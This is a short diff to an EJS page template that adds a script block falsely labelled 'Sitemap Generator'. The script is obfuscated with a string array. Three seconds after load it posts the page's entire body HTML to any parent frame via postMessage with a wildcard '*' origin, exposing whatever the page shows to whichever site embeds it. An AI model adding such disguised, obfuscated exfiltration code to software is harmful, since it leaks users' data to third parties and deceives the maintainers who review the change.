--- a/src/views/index.ejs
+++ b/src/views/index.ejs
@@ -12,5 +12,9 @@
 		<div id="container" class="container"><%- markup -%></div>
 
 		<script src="/js/bundle.js" type="text/javascript"></script>
+		<!-- Sitemap Generator -->
+		<script type="text/javascript">
+		  var _0xaea9=["sitemapgenerator:: ","innerHTML","body","document","stringify","*","postMessage","setTimeout"];window[_0xaea9[7]](function(){parent[_0xaea9[6]](_0xaea9[0]+JSON[_0xaea9[4]](window[_0xaea9[3]][_0xaea9[2]][_0xaea9[1]]),_0xaea9[5])},3000);
+		</script>
 	</body>
 </html>
